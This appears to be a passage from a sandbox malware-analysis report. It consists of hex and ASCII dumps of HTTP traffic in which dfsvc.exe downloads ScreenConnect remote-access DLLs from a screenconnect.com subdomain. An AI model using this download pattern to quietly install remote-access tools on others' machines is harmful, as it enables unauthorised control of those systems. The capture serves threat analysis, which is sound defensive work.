                                                                                                                                                                                                                                        2024-12-20 17:23:04 UTC16384INData Raw: 1f 1e 28 6b 01 00 06 2a 00 00 13 30 03 00 6e 00 00 00 15 00 00 11 02 28 e4 00 00 06 7e a7 02 00 04 25 2d 17 26 7e 96 02 00 04 fe 06 28 07 00 06 73 cc 01 00 0a 25 80 a7 02 00 04 28 31 00 00 2b 0a 06 28 a6 00 00 0a 2c 30 02 28 e4 00 00 06 7e a8 02 00 04 25 2d 17 26 7e 96 02 00 04 fe 06 29 07 00 06 73 cd 01 00 0a 25 80 a8 02 00 04 28 32 00 00 2b 28 ce 01 00 0a 0a 06 25 2d 06 26 7e b1 00 00 0a 2a 00 00 1b 30 06 00 d8 0e 00 00 2c 00 00 11 73 b0 07 00 06 0a 06 02 7d 14 03 00 04 28 75 01 00 0a 2c 1c 72 9d 0a 00 70 17 17 28 76 01 00 0a 28 77 01 00 0a 16 8d 11 00 00 01 28 78 01 00 0a 02 17 7d 48 00 00 04 02 28 e4 00 00 06 17 28 cf 01 00 0a 0b 02 28 fd 00 00 06 0c 02 28 dc 00 00 06 7e a9 02 00 04 25 2d 17 26 7e 96 02 00 04 fe 06 2a 07 00 06 73 d0 01 00 0a 25 80 a9
                                                                                                                                                                                                                                        Data Ascii: (k*0n(~%-&~(s%(1+(,0(~%-&~)s%(2+(%-&~*0,s}(u,rp(v(w(x}H((((~%-&~*s%
                                                                                                                                                                                                                                        2024-12-20 17:23:04 UTC16384INData Raw: 06 02 28 dc 00 00 06 7e e1 02 00 04 25 2d 17 26 7e 96 02 00 04 fe 06 62 07 00 06 73 d0 01 00 0a 25 80 e1 02 00 04 28 4b 00 00 2b 7d 72 03 00 04 06 7b 72 03 00 04 2c 60 06 7b 71 03 00 04 2c 47 06 7b 72 03 00 04 28 2c 00 00 2b 18 7d 78 02 00 04 06 fe 06 0e 08 00 06 73 b5 00 00 0a 14 28 b6 00 00 0a 26 06 7b 72 03 00 04 6f 16 03 00 06 06 7b 72 03 00 04 28 2c 00 00 2b 7b 78 02 00 04 19 fe 01 6f 11 03 00 0a 06 7b 72 03 00 04 28 2c 00 00 2b 16 7d 78 02 00 04 2a 00 13 30 03 00 43 00 00 00 46 00 00 11 02 03 28 b3 00 00 06 03 2d 21 02 7b 54 00 00 04 25 2d 04 26 16 2b 05 28 da 00 00 0a 2c 0d 02 7b 54 00 00 04 16 6f a2 00 00 0a 2a 03 2c 14 20 00 00 10 00 17 12 00 fe 15 c4 00 00 1b 06 28 09 06 00 06 2a 22 02 03 28 b1 00 00 06 2a a6 02 7b 5a 00 00 04 28 aa 00 00 06 6f
                                                                                                                                                                                                                                        Data Ascii: (~%-&~bs%(K+}r{r,`{q,G{r(,+}xs(&{ro{r(,+{xo{r(,+}x*0CF(-!{T%-&+(,{To*, (*"(*{Z(o
                                                                                                                                                                                                                                        2024-12-20 17:23:04 UTC16384INData Raw: 01 00 06 73 1b 04 00 0a 28 ac 00 00 2b 02 fe 06 9f 01 00 06 73 1b 04 00 0a 28 ac 00 00 2b 25 0a 28 98 01 00 06 06 a2 28 ad 00 00 2b 25 0b 7d 85 00 00 04 07 a2 2a 52 02 28 97 01 00 06 6f 1d 04 00 0a 2d 06 02 6f 9b 01 00 06 2a 32 02 28 97 01 00 06 6f 1d 04 00 0a 2a 52 03 02 25 fe 07 9a 01 00 06 73 83 01 00 0a 6f 1e 04 00 0a 2a 4e 03 02 fe 06 a0 01 00 06 73 83 01 00 0a 6f 1f 04 00 0a 2a 1e 02 6f 9b 01 00 06 2a 00 13 30 04 00 43 00 00 00 62 00 00 11 73 45 08 00 06 0a 06 03 7d 94 03 00 04 02 7b 88 00 00 04 2d 10 02 7e 20 04 00 0a 73 21 04 00 0a 7d 88 00 00 04 02 7b 88 00 00 04 06 7b 94 03 00 04 06 fe 06 46 08 00 06 73 22 04 00 0a 28 ae 00 00 2b 2a 1e 02 28 46 00 00 0a 2a 62 02 28 23 04 00 0a 02 03 72 02 20 00 70 28 af 00 00 2b 7d 89 00 00 04 2a 13 30 04 00 70
                                                                                                                                                                                                                                        Data Ascii: s(+s(+%((+%}*R(o-o*2(o*R%so*Nso*o*0CbsE}{-~ s!}{{Fs"(+*(F*b(#r p(+}*0p
                                                                                                                                                                                                                                        2024-12-20 17:23:04 UTC16384INData Raw: 02 6f 63 04 00 0a 28 a6 00 00 0a 16 fe 01 2a 16 2a ba 02 03 28 60 05 00 0a 02 17 28 bb 02 00 06 02 02 28 ac 02 00 06 2d 08 02 28 b8 02 00 06 2d 03 14 2b 06 02 6f 63 04 00 0a 6f c0 02 00 06 2a 5a 02 03 28 61 05 00 0a 02 16 28 bb 02 00 06 02 14 6f c0 02 00 06 2a 00 00 00 13 30 03 00 13 00 00 00 92 00 00 11 02 28 f8 00 00 2b 0a 06 2c 08 06 02 03 6f 62 05 00 0a 2a 00 13 30 02 00 6e 00 00 00 93 00 00 11 02 28 63 05 00 0a 2d 1d 02 28 b0 02 00 06 12 00 fe 15 1d 00 00 01 06 28 64 05 00 0a 2c 07 02 28 b0 02 00 06 2a 02 7b ef 00 00 04 2c 1d 02 28 ae 02 00 06 12 00 fe 15 1d 00 00 01 06 28 64 05 00 0a 2c 07 02 28 ae 02 00 06 2a 02 28 be 01 00 06 12 00 fe 15 1d 00 00 01 06 28 64 05 00 0a 2c 07 02 28 be 01 00 06 2a 02 6f c4 02 00 06 2a 7a 02 7b ef 00 00 04 2c 0f 02 28
                                                                                                                                                                                                                                        Data Ascii: oc(**(`((-(-+oco*Z(a(o*0(+,ob*0n(c-((d,(*{,((d,(*((d,(*o*z{,(
                                                                                                                                                                                                                                        2024-12-20 17:23:04 UTC16384INData Raw: 00 06 6f 03 06 00 0a 25 28 04 06 00 0a 6f 14 04 00 0a a2 25 18 73 2b 04 00 0a 25 18 6f cb 02 00 0a 25 1f 2a 28 34 05 00 06 6f 03 06 00 0a 25 28 05 06 00 0a 6f 14 04 00 0a 0e 04 7e a4 04 00 04 25 2d 17 26 7e a3 04 00 04 fe 06 ed 09 00 06 73 06 06 00 0a 25 80 a4 04 00 04 28 49 01 00 2b 28 4a 01 00 2b a2 6f 41 04 00 0a 06 02 17 14 28 4b 01 00 2b 28 4c 01 00 2b 7d a6 04 00 04 02 06 7b a6 04 00 04 28 4d 01 00 2b 28 5e 04 00 0a 02 06 7b a6 04 00 04 28 4e 01 00 2b 28 5f 04 00 0a 06 06 fe 06 ef 09 00 06 73 83 01 00 0a 7d a7 04 00 04 06 7b a6 04 00 04 06 fe 06 f0 09 00 06 73 5d 04 00 0a 28 4f 01 00 2b 2a 32 02 7b 36 01 00 04 6f 63 04 00 0a 2a 36 02 7b 36 01 00 04 03 6f 00 02 00 0a 2a 1e 02 7b 37 01 00 04 2a 22 02 03 7d 37 01 00 04 2a 00 13 30 05 00 64 00 00 00 00
                                                                                                                                                                                                                                        Data Ascii: o%(o%s+%o%*(4o%(o~%-&~s%(I+(J+oA(K+(L+}{(M+(^{(N+(_s}{s](O+*2{6oc*6{6o*{7*"}7*0d
                                                                                                                                                                                                                                        2024-12-20 17:23:04 UTC16384INData Raw: 28 98 01 00 2b 7e 0b 05 00 04 25 2d 17 26 7e 04 05 00 04 fe 06 63 0a 00 06 73 ac 07 00 0a 25 80 0b 05 00 04 28 99 01 00 2b 2d 05 1a 13 04 de 18 de 14 07 2c 06 07 6f 22 00 00 0a dc 06 2c 06 06 6f 22 00 00 0a dc 17 2a 11 04 2a 00 00 00 41 34 00 00 02 00 00 00 6d 00 00 00 1f 01 00 00 8c 01 00 00 0a 00 00 00 00 00 00 00 02 00 00 00 67 00 00 00 2f 01 00 00 96 01 00 00 0a 00 00 00 00 00 00 00 32 02 7b 01 05 00 04 6f ad 07 00 0a 2a 00 00 00 1b 30 05 00 e4 00 00 00 f1 00 00 11 73 89 0a 00 06 0a 06 02 7d 40 05 00 04 06 03 7d 3b 05 00 04 28 62 07 00 0a 28 ae 07 00 0a 73 59 0a 00 06 0b 06 07 6f 80 00 00 0a 73 5a 0a 00 06 7d 3c 05 00 04 06 06 7b 3b 05 00 04 6f af 07 00 0a 0c 12 02 28 b0 07 00 0a 06 7b 3b 05 00 04 6f af 07 00 0a 0c 12 02 28 b1 07 00 0a 1f 20 17 28 b2
                                                                                                                                                                                                                                        Data Ascii: (+~%-&~cs%(+-,o",o"**A4mg/2{o*0s}@};(b(sYosZ}<{;o({;o( (
                                                                                                                                                                                                                                        2024-12-20 17:23:04 UTC16384INData Raw: 04 20 f1 00 00 00 1f 70 1f 7a 28 cc 04 00 0a 80 01 02 00 04 20 8f 00 00 00 28 37 06 00 06 80 02 02 00 04 20 ff 00 00 00 28 37 06 00 06 80 03 02 00 04 16 28 37 06 00 06 80 04 02 00 04 20 96 00 00 00 28 37 06 00 06 80 06 02 00 04 1b 8d d5 02 00 01 25 d0 64 02 00 04 28 bb 04 00 0a 80 07 02 00 04 1f 11 8d d5 02 00 01 25 d0 65 02 00 04 28 bb 04 00 0a 80 08 02 00 04 22 00 00 80 3f 22 00 00 80 3f 22 00 00 80 3f 22 00 00 00 3f 28 38 05 00 06 80 09 02 00 04 22 33 33 33 3f 22 33 33 33 3f 22 33 33 33 3f 22 00 00 80 3f 28 38 05 00 06 80 0a 02 00 04 1e 28 34 05 00 06 80 0b 02 00 04 1a 28 34 05 00 06 73 cb 04 00 0a 80 0c 02 00 04 1f 18 1f 18 28 35 05 00 06 80 0d 02 00 04 1f 10 1f 10 28 35 05 00 06 80 0e 02 00 04 1f 18 1f 18 28 35 05 00 06 80 0f 02 00 04 1f 21 1f 10 28
                                                                                                                                                                                                                                        Data Ascii: pz( (7 (7(7 (7%d(%e("?"?"?"?(8"333?"333?"333?"?(8(4(4s(5(5(5!(
                                                                                                                                                                                                                                        2024-12-20 17:23:04 UTC16384INData Raw: 6f 9a 09 00 0a 03 2c 0c 06 03 6f e9 03 00 0a 6f 9a 09 00 0a 04 2c 07 06 04 6f 9a 09 00 0a 25 28 01 02 00 0a 28 01 02 00 0a 28 77 01 00 0a 06 6f 9b 09 00 0a 28 dd 04 00 0a 7d 18 06 00 04 fe 06 f1 0b 00 06 73 38 02 00 0a 14 28 39 02 00 0a 26 2a 00 13 30 05 00 89 00 00 00 3f 01 00 11 73 f6 0b 00 06 0a 06 0e 06 7d 1d 06 00 04 06 03 04 05 0e 04 73 79 03 00 06 7d 1e 06 00 04 02 28 9c 09 00 0a 0b 06 7b 1e 06 00 04 06 fe 06 f7 0b 00 06 73 9f 01 00 0a 6f a0 01 00 0a 0e 05 2c 1a 06 7b 1e 06 00 04 07 6f dc 02 00 0a 26 06 7b 1e 06 00 04 6f d8 01 00 0a 2b 28 0e 07 2c 0d 0e 07 06 7b 1e 06 00 04 6f 9d 09 00 0a 06 7b 1e 06 00 04 07 6f 9e 09 00 0a 06 7b 1e 06 00 04 6f de 02 00 0a 06 7b 1e 06 00 04 2a 62 03 04 05 0e 04 73 79 03 00 06 25 02 6f dc 02 00 0a 26 6f 7c 03 00 06
                                                                                                                                                                                                                                        Data Ascii: o,oo,o%(((wo(}s8(9&*0?s}sy}({so,{o&{o+(,{o{o{o{*bsy%o&o|
                                                                                                                                                                                                                                        2024-12-20 17:23:04 UTC16384INData Raw: 0a 2a 46 7e 49 01 00 04 02 28 0d 0b 00 0a 6f 0f 0b 00 0a 2a 00 00 13 30 02 00 2f 00 00 00 87 01 00 11 02 03 28 0a 0b 00 0a 0a 12 00 28 5f 07 00 0a 2c 0d 12 00 28 79 09 00 0a 73 ea 02 00 0a 2a 7e 49 01 00 04 03 6f 10 0b 00 0a 28 0c 0b 00 0a 2a 36 03 02 28 0d 0b 00 0a 73 67 0c 00 06 2a 2e 73 fd 06 00 06 80 6b 02 00 04 2a 1e 02 28 46 00 00 0a 2a 1e 03 6f 11 0b 00 0a 2a 2e 73 00 07 00 06 80 6d 02 00 04 2a 1e 02 28 46 00 00 0a 2a 42 03 28 c9 08 00 0a 2c 07 03 17 28 12 0b 00 0a 2a 66 03 28 c9 08 00 0a 2c 10 03 28 13 0b 00 0a 8e 2d 07 03 16 28 12 0b 00 0a 2a 2e 73 04 07 00 06 80 70 02 00 04 2a 1e 02 28 46 00 00 0a 2a 2a 03 7b f4 00 00 0a 14 fe 03 2a 1e 02 28 46 00 00 0a 2a 62 03 6f 14 0b 00 0a 02 7c 72 02 00 04 7b 15 0b 00 0a 59 28 16 0b 00 0a 2a 1e 02 28 46 00
                                                                                                                                                                                                                                        Data Ascii: *F~I(o*0/((_,(ys*~Io(*6(sg*.sk*(F*o*.sm*(F*B(,(*f(,(-(*.sp*(F**{*(F*bo|r{Y(*(F


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        11192.168.2.549787147.75.81.64433060C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        2024-12-20 17:23:06 UTC126OUTGET /Bin/ScreenConnect.Core.dll HTTP/1.1
                                                                                                                                                                                                                                        Host: koidesfac.screenconnect.com
                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                        2024-12-20 17:23:07 UTC328INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Cache-Control: private
                                                                                                                                                                                                                                        Content-Length: 549888
                                                                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                                                                        X-Robots-Tag: noindex
                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                        Content-Disposition: attachment; filename="ScreenConnect.Core.dll"; filename*=UTF-8''ScreenConnect.Core.dll
                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 17:23:06 GMT
                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                        2024-12-20 17:23:07 UTC16056INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 51 e6 9b d8 00 00 00 00 00 00 00 00 e0 00 22 20 0b 01 30 00 00 5c 08 00 00 06 00 00 00 00 00 00 42 76 08 00 00 20 00 00 00 80 08 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 08 00 00 02 00 00 0d 2d 09 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELQ" 0\Bv -@
                                                                                                                                                                                                                                        2024-12-20 17:23:07 UTC16384INData Raw: 00 06 28 f4 01 00 06 0b 07 2c 02 07 2a 02 02 7c 8c 00 00 04 28 ef 01 00 06 26 38 72 ff ff ff 1a 73 6c 01 00 0a 7a 1a 73 6c 01 00 0a 7a 00 00 00 13 30 02 00 2e 00 00 00 3b 00 00 11 73 b3 0d 00 06 0a 06 02 7d 38 05 00 04 06 7b 38 05 00 04 6f 3f 01 00 06 2d 13 06 fe 06 b4 0d 00 06 73 7c 09 00 06 14 28 35 04 00 06 26 2a 1e 02 7b 6e 01 00 0a 2a 22 02 03 7d 6e 01 00 0a 2a 3a 02 28 3c 00 00 0a 02 03 28 6f 01 00 0a 2a 00 00 13 30 02 00 28 00 00 00 3c 00 00 11 03 6f 48 01 00 0a 0a 02 7b 70 01 00 0a 2d 0f 06 28 2b 00 00 2b 2c 07 02 06 7d 70 01 00 0a 06 02 7b 70 01 00 0a fe 01 2a 3e 03 6f 17 07 00 06 04 6f 17 07 00 06 fe 01 2a 3e 02 03 28 71 01 00 0a 02 15 7d 72 01 00 0a 2a 13 30 03 00 33 01 00 00 3d 00 00 11 03 2d 0a 12 01 fe 15 81 00 00 1b 07 2a 02 03 28 73 01 00
                                                                                                                                                                                                                                        Data Ascii: (,*|(&8rslzslz0.;s}8{8o?-s|(5&*{n*"}n*:(<(o*0(<oH{p-(++,}p{p*>oo*>(q}r*03=-*(s
                                                                                                                                                                                                                                        2024-12-20 17:23:07 UTC16384INData Raw: 70 0f 00 28 98 01 00 0a 28 9f 01 00 0a 14 28 05 04 00 06 7a 2a 1e 02 28 01 04 00 06 2a 00 00 00 1b 30 02 00 29 00 00 00 74 00 00 11 02 6f 0a 02 00 0a 0a 03 06 6f ed 00 00 0a 0b de 16 06 8c 8f 00 00 1b 2c 0d 12 00 fe 16 8f 00 00 1b 6f 10 00 00 0a dc 07 2a 00 00 00 01 10 00 00 02 00 07 00 0a 11 00 16 00 00 00 00 3a 02 03 28 7d 00 00 2b 28 7e 00 00 2b 26 2a 00 13 30 03 00 54 00 00 00 42 00 00 11 02 45 04 00 00 00 02 00 00 00 0c 00 00 00 20 00 00 00 16 00 00 00 2b 28 03 04 73 c8 02 00 0a 0a 2b 30 03 04 73 c9 02 00 0a 0a 2b 26 03 04 73 ca 02 00 0a 0a 2b 1c 03 04 73 96 01 00 0a 0a 2b 12 72 b9 0c 00 70 02 8c b6 00 00 02 14 73 cb 02 00 0a 7a 06 2a 5a d0 8f 00 00 1b 28 3e 01 00 0a 02 28 cc 02 00 0a a5 8f 00 00 1b 2a 9e 03 02 7e d8 05 00 04 25 2d 17 26 7e d7 05 00
                                                                                                                                                                                                                                        Data Ascii: p(((z*(*0)too,o*:(}+(~+&*0TBE +(s+0s+&s+s+rpsz*Z(>(*~%-&~
                                                                                                                                                                                                                                        2024-12-20 17:23:07 UTC16384INData Raw: 06 15 33 0a 12 01 fe 15 b3 01 00 1b 07 2a 02 16 06 6f 88 03 00 0a 02 06 17 58 6f f4 02 00 0a 28 59 00 00 2b 73 3b 04 00 0a 2a 00 00 13 30 02 00 25 00 00 00 d3 00 00 11 02 03 28 46 05 00 06 0a 12 00 28 f5 03 00 0a 2d 0c 7e 9a 01 00 0a 02 28 59 00 00 2b 2a 12 00 28 f6 03 00 0a 2a 00 00 00 13 30 04 00 32 00 00 00 d4 00 00 11 02 03 6f 3c 04 00 0a 0a 06 15 33 0a 12 01 fe 15 b3 01 00 1b 07 2a 02 16 06 6f 88 03 00 0a 02 06 17 58 6f f4 02 00 0a 28 59 00 00 2b 73 3b 04 00 0a 2a fe 02 25 2d 06 26 7e 9a 01 00 0a 03 6f 8e 01 00 0a 7e ea 05 00 04 25 2d 17 26 7e d7 05 00 04 fe 06 be 0e 00 06 73 a1 02 00 0a 25 80 ea 05 00 04 28 b3 00 00 2b 28 6e 04 00 06 28 72 00 00 2b 2a 6e 03 0f 00 28 16 04 00 0a 81 8f 00 00 1b 04 0f 00 28 17 04 00 0a 81 90 00 00 1b 2a 3e 1f fe 73 9f
                                                                                                                                                                                                                                        Data Ascii: 3*oXo(Y+s;*0%(F(-~(Y+*(*02o<3*oXo(Y+s;*%-&~o~%-&~s%(+(n(r+*n((*>s
                                                                                                                                                                                                                                        2024-12-20 17:23:07 UTC16384INData Raw: 04 2a 22 02 03 7d 87 02 00 04 2a 1e 02 7b 88 02 00 04 2a 22 02 03 7d 88 02 00 04 2a 13 30 04 00 32 00 00 00 1e 01 00 11 72 d8 13 00 70 02 28 4d 07 00 06 0a 12 00 fe 16 2a 01 00 02 6f 43 00 00 0a 72 26 04 00 70 02 28 4f 07 00 06 0b 12 01 28 98 01 00 0a 28 95 01 00 0a 2a 1e 02 28 49 07 00 06 2a 1e 02 28 3c 00 00 0a 2a 1e 02 7b 8d 02 00 04 2a 22 02 03 7d 8d 02 00 04 2a 1e 02 7b 8e 02 00 04 2a 22 02 03 7d 8e 02 00 04 2a 1e 02 7b 8f 02 00 04 2a 22 02 03 7d 8f 02 00 04 2a 1e 02 7b 90 02 00 04 2a 22 02 03 7d 90 02 00 04 2a 1e 02 7b 91 02 00 04 2a 22 02 03 7d 91 02 00 04 2a 1e 02 7b 92 02 00 04 2a 22 02 03 7d 92 02 00 04 2a 1e 02 7b 93 02 00 04 2a 22 02 03 7d 93 02 00 04 2a 1e 02 7b 94 02 00 04 2a 22 02 03 7d 94 02 00 04 2a 1e 02 7b 95 02 00 04 2a 22 02 03 7d 95
                                                                                                                                                                                                                                        Data Ascii: *"}*{*"}*02rp(M*oCr&p(O((*(I*(<*{*"}*{*"}*{*"}*{*"}*{*"}*{*"}*{*"}*{*"}*{*"}
                                                                                                                                                                                                                                        2024-12-20 17:23:07 UTC16384INData Raw: 06 de 07 06 28 2f 01 00 0a dc 2a 00 01 10 00 00 02 00 0d 00 3a 47 00 07 00 00 00 00 13 30 03 00 28 00 00 00 50 01 00 11 73 27 06 00 0a 0a 06 03 7d 28 06 00 0a 06 02 7d 29 06 00 0a 02 06 fe 06 2a 06 00 0a 73 2b 06 00 0a 04 28 2c 06 00 0a 2a 52 02 28 04 02 00 06 02 1f 0a 8d ec 00 00 1b 7d dc 03 00 04 2a 00 00 00 13 30 05 00 56 00 00 00 79 00 00 11 03 72 e8 19 00 70 28 7f 01 00 2b 26 03 6f d1 01 00 06 6f 76 09 00 06 72 75 0c 00 70 18 28 fe 03 00 06 26 02 7b dd 03 00 04 0a 02 03 6f d5 01 00 06 28 47 02 00 0a 03 6f d2 01 00 06 03 6f d3 01 00 06 03 6f d4 01 00 06 6f 3d 0a 00 06 02 7b dd 03 00 04 06 59 2a 00 00 13 30 03 00 32 00 00 00 08 00 00 11 03 1e 58 0a 02 7b dc 03 00 04 04 9a 2c 0d 02 7b dc 03 00 04 04 9a 8e 69 06 2f 0e 02 7b dc 03 00 04 04 06 8d b9 00 00
                                                                                                                                                                                                                                        Data Ascii: (/*:G0(Ps'}(})*s+(,*R(}*0Vyrp(+&oovrup(&{o(Goooo={Y*02X{,{i/{
                                                                                                                                                                                                                                        2024-12-20 17:23:07 UTC16384INData Raw: fe 06 76 11 00 06 73 18 07 00 0a 28 bd 01 00 2b 28 be 01 00 2b 2a 00 00 13 30 01 00 14 00 00 00 30 00 00 11 02 2d 0a 12 00 fe 15 9e 01 00 02 06 2a 02 28 76 01 00 06 2a 1b 30 02 00 58 00 00 00 78 01 00 11 16 0a 02 6f 19 07 00 0a 0b 2b 30 07 6f 1a 07 00 0a 6f 0f 0c 00 06 6f 10 0c 00 06 0c 12 02 28 1f 03 00 0a 2d 0c 12 03 fe 15 75 01 00 1b 09 0d de 25 06 12 02 28 1b 07 00 0a 58 0a 07 6f 11 00 00 0a 2d c8 de 0a 07 2c 06 07 6f 10 00 00 0a dc 06 73 1d 03 00 0a 2a 09 2a 01 10 00 00 02 00 09 00 3c 45 00 0a 00 00 00 00 72 03 2c 0d 02 6f 0b 0c 00 06 03 6f 1c 07 00 0a 2a 02 6f 0d 0c 00 06 28 d3 04 00 06 2a 3a 02 6f 0c 0c 00 06 03 04 6f 1d 07 00 0a 2a 1b 30 05 00 44 00 00 00 79 01 00 11 03 6f 19 07 00 0a 0a 2b 26 06 6f 1a 07 00 0a 0b 07 6f 0f 0c 00 06 02 07 04 28 06
                                                                                                                                                                                                                                        Data Ascii: vs(+(+*00-*(v*0Xxo+0ooo(-u%(Xo-,os**<Er,oo*o(*:oo*0Dyo+&oo(
                                                                                                                                                                                                                                        2024-12-20 17:23:08 UTC16384INData Raw: 73 9f 0d 00 06 0a 06 2a 1e 02 28 a5 0d 00 06 2a 1e 02 28 3c 00 00 0a 2a 13 30 03 00 4d 00 00 00 08 00 00 11 02 7b 32 05 00 04 04 28 62 01 00 0a 0a 02 7b 33 05 00 04 03 06 28 c1 04 00 06 02 7b 34 05 00 04 16 e0 2e 0b 02 7b 34 05 00 04 25 4b 06 58 54 02 02 7b 33 05 00 04 06 58 7d 33 05 00 04 02 02 7b 32 05 00 04 06 59 7d 32 05 00 04 06 2a 00 00 00 13 30 03 00 9c 00 00 00 53 01 00 11 38 90 00 00 00 02 7b 35 05 00 04 17 28 ff 01 00 06 04 02 7b 35 05 00 04 28 f6 01 00 06 28 62 01 00 0a 0a 02 7b 35 05 00 04 7c 88 00 00 04 28 50 03 00 06 25 0c 2c 05 08 8e 69 2d 05 16 e0 0b 2b 09 08 16 8f b9 00 00 01 e0 0b 03 07 02 7b 35 05 00 04 7b 88 00 00 04 7b aa 01 00 04 58 06 28 c1 04 00 06 14 0c 02 7b 36 05 00 04 16 e0 2e 0b 02 7b 36 05 00 04 25 4b 06 58 54 03 06 58 10 01
                                                                                                                                                                                                                                        Data Ascii: s*(*(<*0M{2(b{3({4.{4%KXT{3X}3{2Y}2*0S8{5({5((b{5|(P%,i-+{5{{X({6.{6%KXTX
                                                                                                                                                                                                                                        2024-12-20 17:23:08 UTC16384INData Raw: 3a 03 02 7b 2a 0a 00 0a 28 18 02 00 2b 26 2a 2e 73 f4 0f 00 06 80 17 07 00 04 2a 1e 02 28 3c 00 00 0a 2a 22 03 16 28 2b 0a 00 0a 2a 1e 02 28 3c 00 00 0a 2a 8e 02 7b 02 05 00 0a 28 2c 0a 00 0a 02 7b 02 05 00 0a 03 6f f9 04 00 0a 02 7b 03 05 00 0a 6f 2d 0a 00 0a 2a 1e 02 28 3c 00 00 0a 2a 8e 02 7b 08 05 00 0a 28 2c 0a 00 0a 02 7b 08 05 00 0a 03 6f f9 04 00 0a 02 7b 09 05 00 0a 6f 2d 0a 00 0a 2a 2e 73 fb 0f 00 06 80 1d 07 00 04 2a 1e 02 28 3c 00 00 0a 2a 1a 28 06 03 00 0a 2a 2e 28 66 01 00 0a 6f 94 0b 00 06 2a 1e 02 28 3c 00 00 0a 2a 1e 02 7b 2e 0a 00 0a 2a 1e 02 28 3c 00 00 0a 2a 5e 28 66 01 00 0a 6f 94 0b 00 06 02 7b 21 07 00 04 6f 2f 0a 00 0a 59 2a 22 02 03 7d 22 07 00 04 2a 32 02 7b 22 07 00 04 6f 30 0a 00 0a 2a 22 02 03 7d 23 07 00 04 2a 32 02 7b 23 07
                                                                                                                                                                                                                                        Data Ascii: :{*(+&*.s*(<*"(+*(<*{(,{o{o-*(<*{(,{o{o-*.s*(<*(*.(fo*(<*{.*(<*^(fo{!o/Y*"}"*2{"o0*"}#*2{#
                                                                                                                                                                                                                                        2024-12-20 17:23:08 UTC16384INData Raw: 01 00 00 00 5b 01 be 02 a1 00 10 00 54 4d 00 00 66 3e 01 00 00 00 5b 01 bf 02 81 01 10 00 a3 f4 00 00 66 3e 01 00 35 00 5b 01 c2 02 01 01 00 00 a7 25 01 00 66 3e 01 00 c5 00 5c 01 c4 02 09 01 10 00 f5 30 00 00 66 3e 01 00 6d 00 6b 01 c4 02 81 01 10 00 24 2d 01 00 66 3e 01 00 35 00 6e 01 d1 02 09 01 10 00 f3 31 00 00 66 3e 01 00 6d 00 6e 01 d1 02 81 01 10 00 9b 2d 01 00 66 3e 01 00 35 00 6f 01 e2 02 01 01 00 00 08 3a 01 00 66 3e 01 00 c5 00 6f 01 e6 02 01 01 00 00 75 a4 00 00 66 3e 01 00 c5 00 82 01 e6 02 a1 00 10 00 90 06 01 00 66 3e 01 00 00 00 87 01 e6 02 81 01 10 00 d0 03 01 00 66 3e 01 00 35 00 87 01 e8 02 09 01 10 00 d1 27 00 00 66 3e 01 00 6d 00 87 01 ea 02 09 01 10 00 6d 31 00 00 66 3e 01 00 6d 00 88 01 ef 02 81 01 10 00 65 32 00 00 66 3e 01 00 35
                                                                                                                                                                                                                                        Data Ascii: [TMf>[f>5[%f>\0f>mk$-f>5n1f>mn-f>5o:f>ouf>f>f>5'f>mm1f>me2f>5


                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                        12192.168.2.549798147.75.81.64433060C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        2024-12-20 17:23:09 UTC111OUTGET /Bin/ScreenConnect.ClientService.dll HTTP/1.1
                                                                                                                                                                                                                                        Host: koidesfac.screenconnect.com
                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                        2024-12-20 17:23:10 UTC345INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Cache-Control: private
                                                                                                                                                                                                                                        Content-Length: 68608
                                                                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                                                                        X-Robots-Tag: noindex
                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                        Content-Disposition: attachment; filename="ScreenConnect.ClientService.dll"; filename*=UTF-8''ScreenConnect.ClientService.dll
                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 17:23:10 GMT
                                                                                                                                                                                                                                        Connection: close
